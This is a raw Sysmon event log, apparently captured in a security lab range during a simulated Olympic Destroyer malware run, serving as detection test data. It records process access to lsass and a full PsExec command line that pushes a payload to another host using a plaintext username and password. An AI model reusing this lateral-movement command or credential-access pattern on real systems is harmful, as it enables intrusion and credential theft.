10:57:09.920{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1305-6216-1706-000000003802}3112C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292536Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.920{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1305-6216-1706-000000003802}3112C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292535Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.916{C8EA50B7-1305-6216-1706-000000003802}31126268C:\Windows\system32\conhost.exe{C8EA50B7-1305-6216-1506-000000003802}6156C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000292534Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.883{C8EA50B7-1305-6216-1406-000000003802}6012C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000292533Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.883{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-1305-6216-1706-000000003802}3112C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292532Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.883{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-1305-6216-1406-000000003802}6012C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292531Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.883{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-1305-6216-1406-000000003802}6012C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292530Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.867{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1305-6216-1706-000000003802}3112C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000292529Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:09.867{C8EA50B7-1305-6216-1406-000000003802}6012C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000292528Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.867{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292527Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.851{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292526Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.851{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292525Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.851{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292524Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.851{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000217769Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:11.337{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6CE610D19D312AFFA9EA08D71524860,SHA256=B0A1016D77623B281C4D8D69F5C18D258B961AAEF731AB16A4618D8AA25E169E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292555Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:11.920{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1307-6216-1806-000000003802}6148C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292554Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:11.920{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292553Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:11.920{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292552Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:11.920{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292551Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:11.920{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292550Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:11.918{C8EA50B7-12E6-6216-4B05-000000003802}67926928C:\Temp\olympic_destroyer.exe{C8EA50B7-1307-6216-1806-000000003802}6148C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292549Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:11.916{C8EA50B7-1307-6216-1806-000000003802}6148C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\ip-10-0-1-12.eu-central-1.compute.internal -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292548Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:11.916{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1307-6216-1806-000000003802}6148C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000292547Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:11.898{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=3958198629A79ECBB4C283D0F7EFF460,SHA256=B4AB720D79B5B8FAA2DEA4950CCF61AF1266FAA0C59AE5D5D069119B91CD1EAD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000292546Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:08.609{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53716-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000292545Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:11.167{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF147088C795A476253415CED9EC7935,SHA256=0E767D8549A1E6AD2AC2BE2CA5ED828D393291B55468A21609CDD84A89408AD6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292544Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:11.167{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=252EE62BED85CB1B6DD769083D7F4658,SHA256=0BC79FDDA668BA717DB45A8D8298C2AA0C0BF791A56A85418CDB9CF2CD6EFC2A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217771Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:10.691{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51416-false10.0.1.12-8000- 23542300x8000000000000000217770Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:12.384{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4906D1AC70764FBABEF8313FD74651CC,SHA256=BB733B3B32768FC5A01A4DE126A15944D481B576A495CB01D07DAE99FBDF1D38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292584Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:12.921{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=C2001D988EA06478C5EF2A8BEF746A91,SHA256=2E1069DF4FBCBBAD27F931A1A5CF7EF5A72670F488F69C4B90EFB5D8B0AEAB25,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292583Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:12.583{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000292582Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:12.568{C8EA50B7-1308-6216-1A06-000000003802}676C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000292581Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:12.568{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1308-6216-1A06-000000003802}676C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292580Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:12.568{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1308-6216-1A06-000000003802}676C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dl